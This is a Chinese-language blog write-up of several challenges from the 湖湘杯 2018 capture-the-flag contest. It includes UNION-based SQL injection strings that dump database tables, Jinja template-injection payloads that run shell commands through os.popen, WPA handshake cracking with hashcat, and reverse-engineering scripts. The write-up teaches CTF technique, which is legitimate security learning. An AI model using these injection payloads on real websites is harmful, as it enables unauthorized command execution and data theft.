• CTF 湖湘杯 2018 WriteUp (部分)


    湖湘杯 2018 WriteUp (部分),欢迎转载,转载请注明出处https://www.cnblogs.com/iAmSoScArEd/p/10016564.html !

    1、  CodeCheck(WEB)

    测试admin ‘ or ‘1’=’1’# ,php报错。点击登录框下面的滚动通知,URL中有id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09,想到注入,但是不管输入什么都给弹到index,于是扔下这个思路。掏出目录扫描工具,发现存在list.zip,打开后是前面存在注入的界面。

     

    图中告诉了加密的算法,AES-128-CBC对称加密,给了iv和key。并且若id后七位不是hxb2018则发生跳转(知道了之前一直跳index的原因),并且在最后返回的内容中会过滤掉空格。

     

    上图可以看到注入的下面根据审计出的东西进行构造sql注入语句,因为会过滤空格,所以需要对空格进行代替,那就选择常用的注释/**/吧。

    第一次注入为了测试有效性构造了1/**/and/**/1=2/**/union/**/select/**/1,2,3,4/**/hxb2018

    对其进行AES-128-CBC加密,加密配置如下图:

    拿到加密的结果放到id=后面,发现原通知部分显示了数字2和3,(3在正文部分)所以我们用第三个字段的位置来显示查询内容。

    1,构造爆表语句:

    1/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(table_name),4/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/hxb2018

    结果:notice,notice2,stormgroup_member

    2,构造爆字段语句:

    1/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(column_name),4/**/from/**/information_schema.columns/**/where/**/table_name=notice2/**/hxb2018

    结果:id,title

    3,构造爆记录语句:

    1/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(id,0x3a,title),4/**/from/**/notice2/**/hxb2018

    结果:1,hxb2018{088425ca08783233bbe9d21a3015f5f6}


    (在这里没有写出加密的密文,在之前已经讲了如何配置加密参数,只需要把上面的SQL语句放进去直接加密皆可以了。其他表和字段只需要替换相应位置的名字即可,这里只列出了flag所在表)

    在加密过程中注意的是AES-128-CBC加密的十六进制结果要进行两次base64 encode,因为上面的代码中解密过程用了两次decode。

    2、  XmeO(WEB)

    这道题一上来看到登录框,admin。admin登录,有个评论输入的页面,尝试是不是代码执行或命令执行,然后点击ADD添加以下代码:

    {{().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].popen('ls /home/XmeO').read()}}

    (在这之前我是ls etc/passwd的,发现可以读取文件,就找了一下home目录的文件夹,发现了XmeO与题目名一样的文件夹,于是对该目录进行列文件)。下图:

    根据flag格式 直接find:

    {{().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].popen('find .|xargs grep -ri "hxb" -l').read()}}

    在这里一眼就看见了最后一个auto.js是第一次查询结果的第一个,直接查看这个文件:

    {{().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].popen('cat /home/XmeO/auto.js').read()}}

    3.Flow(MISC)

     

    提取pcap包在线转换成hccapx格式

    用Hashcat 爆破

     

    然后用wireshark导入密码解密

    搜索flag

     

    4题目名:Welcome(MISC)

    解题思路、相关代码和Flag截图:

    这个题就不说了,关注要求的公众号,发hxb2018就行

    5题目名:Replace(REVERSE)

    解题思路、相关代码和Flag截图:

    解题思路:拿到题,先拖进ida再说,然而发现加壳了,查壳发现是upx的壳,遂找了个upx脱壳机,脱壳成功!

    然而,脱壳后的程序无法正常运行,便再次拖入ida,这时代码可以顺利分析了,能不能运行就不重要了。

     

    上图是程序,关键点就在sub_401090()函数里,进入:

     

    分析了下,发现该算法利用已有字节数组对每个输入字符进行了加密,因此思路就是:

    python模仿加密算法进行字节爆破。

    Python脚本如下:

    a1= [0x32,0x61,0x34,0x39,0x66,0x36,0x39,0x63,0x33,0x38,0x33,0x39,0x35,0x63,0x64,0x65,0x39,0x36,0x64,0x36,0x64,0x65,0x39,0x36,0x64,0x36,0x66,0x34,0x65,0x30,0x32,0x35,0x34,0x38,0x34,0x39,0x35,0x34,0x64,0x36,0x31,0x39,0x35,0x34,0x34,0x38,0x64,0x65,0x66,0x36,0x65,0x32,0x64,0x61,0x64,0x36,0x37,0x37,0x38,0x36,0x65,0x32,0x31,0x64,0x35,0x61,0x64,0x61,0x65,0x36]

    a2= [0x61,0x34,0x39,0x66,0x36,0x39,0x63,0x33,0x38,0x33,0x39,0x35,0x63,0x64,0x65,0x39,0x36,0x64,0x36,0x64,0x65,0x39,0x36,0x64,0x36,0x66,0x34,0x65,0x30,0x32,0x35,0x34,0x38,0x34,0x39,0x35,0x34,0x64,0x36,0x31,0x39,0x35,0x34,0x34,0x38,0x64,0x65,0x66,0x36,0x65,0x32,0x64,0x61,0x64,0x36,0x37,0x37,0x38,0x36,0x65,0x32,0x31,0x64,0x35,0x61,0x64,0x61,0x65,0x36]

    a3= [0x63,0x7C,0x77,0x7B,0xF2,0x6B,0x6F,0xC5,0x30,0x01,0x67,0x2B,0xFE,0xD7,0xAB,0x76,0xCA,0x82,0xC9,0x7D,0xFA,0x59,0x47,0xF0,0xAD,0xD4,0xA2,0xAF,0x9C,0xA4,0x72,0xC0,0xB7,0xFD,0x93,0x26,0x36,0x3F,0xF7,0xCC,0x34,0xA5,0xE5,0xF1,0x71,0xD8,0x31,0x15,0x04,0xC7,0x23,0xC3,0x18,0x96,0x05,0x9A,0x07,0x12,0x80,0xE2,0xEB,0x27,0xB2,0x75,0x09,0x83,0x2C,0x1A,0x1B,0x6E,0x5A,0xA0,0x52,0x3B,0xD6,0xB3,0x29,0xE3,0x2F,0x84,0x53,0xD1,0x00,0xED,0x20,0xFC,0xB1,0x5B,0x6A,0xCB,0xBE,0x39,0x4A,0x4C,0x58,0xCF,0xD0,0xEF,0xAA,0xFB,0x43,0x4D,0x33,0x85,0x45,0xF9,0x02,0x7F,0x50,0x3C,0x9F,0xA8,0x51,0xA3,0x40,0x8F,0x92,0x9D,0x38,0xF5,0xBC,0xB6,0xDA,0x21,0x10,0xFF,0xF3,0xD2,0xCD,0x0C,0x13,0xEC,0x5F,0x97,0x44,0x17,0xC4,0xA7,0x7E,0x3D,0x64,0x5D,0x19,0x73,0x60,0x81,0x4F,0xDC,0x22,0x2A,0x90,0x88,0x46,0xEE,0xB8,0x14,0xDE,0x5E,0x0B,0xDB,0xE0,0x32,0x3A,0x0A,0x49,0x06,0x24,0x5C,0xC2,0xD3,0xAC,0x62,0x91,0x95,0xE4,0x79,0xE7,0xC8,0x37,0x6D,0x8D,0xD5,0x4E,0xA9,0x6C,0x56,0xF4,0xEA,0x65,0x7A,0xAE,0x08,0xBA,0x78,0x25,0x2E,0x1C,0xA6,0xB4,0xC6,0xE8,0xDD,0x74,0x1F,0x4B,0xBD,0x8B,0x8A,0x70,0x3E,0xB5,0x66,0x48,0x03,0xF6,0x0E,0x61,0x35,0x57,0xB9,0x86,0xC1,0x1D,0x9E,0xE1,0xF8,0x98,0x11,0x69,0xD9,0x8E,0x94,0x9B,0x1E,0x87,0xE9,0xCE,0x55,0x28,0xDF,0x8C,0xA1,0x89,0x0D,0xBF,0xE6,0x42,0x68,0x41,0x99,0x2D,0x0F,0xB0,0x54,0xBB,0x16]

    def check(ch,i):

        v6 = (ord(ch) >> 4) % 16

        v7 = (16 * ord(ch) >> 4) % 16

        v8 = a1[2 * i]

        if  chr(v8) < '0' or chr(v8) > '9':

            v9 = v8 - ord('W')

        else:

            v9 = v8 - ord('0')

        v10 = a2[2 * i]

        v11 = 16 * v9

        if  chr(v10) < '0' or chr(v10) > '9':

            v12 = v10 - ord('W')

        else:

            v12 = v10 - ord('0')

        if a3[16 * v6 + v7] != ((v11 + v12) ^ 0x19):

            return False

        i += 1

        return True

    buf = ['1', '2', '3']

    flag = []

    for i in range(0, 35):

        for ch in range(0x20,0x7F):

            if check(chr(ch), i):

                flag.append(chr(ch))

    print(''.join(flag))

    运行脚本,很容易就得到flag:

     

    6、  题目名:Common Crypto(CRYPTO)

    解题思路:既然题目名说是Common Crypto,那先把程序拖入ida,运行Findcrypt插件,结果如下:

     

    说明程序中可能存在图中的加密算法,先按照这个思路来

    把Big_Number先转字符串:

     

    看着貌似没用,先放着。

    下来分析程序:

     

    可以看到,程序把输入的flag和String通过RijnDael(Findcrypt猜出来的)加密了,分析String的初始化,发现里面初始化了密钥,idc脚本导出

     

    得到:1B2E3546586E72869BA7B5C8D9EFFFC(密钥)

    继续分析程序,发现接下来程序把加密后的flag输入转成了字符并和给定串比较,那么只要解密给定串就可以知道什么是正确的flag

    用工具解密:

     

    将明文转换成字符串:

     

    可以看到后面是乱码,因为只有前16个字节被真正加密,后面均是填充,故第一步得到的串补在刚得到的串(取16字节)后面即得到正确flag:

    hxb2018{3d39929451ee66ab1658c073}

    欢迎转载,转载请注明出处!

  • 相关阅读:
    关于我的博客园皮肤效果
    Typora结合Git打造完美的个人云笔记本
    linux查看占用端口的进程号并杀死该进程
    关于将ISO 8601格式的时间字符串转化为yyyy-MM-dd hh:mm:ss格式字符串用于前后台传输数据方法
    前后端分离_Vue_axios本地跨域(前端localhost:8080到后端localhost:8090)
    T-SQL 查询分区详细信息和行计数
    INSERT INTO vs SELECT INTO
    SQL Server
    T-SQL 常用语句
    T-SQL Datetime转换成字符类型
  • 原文地址:https://www.cnblogs.com/iAmSoScArEd/p/10016564.html
Copyright © 2020-2023  润新知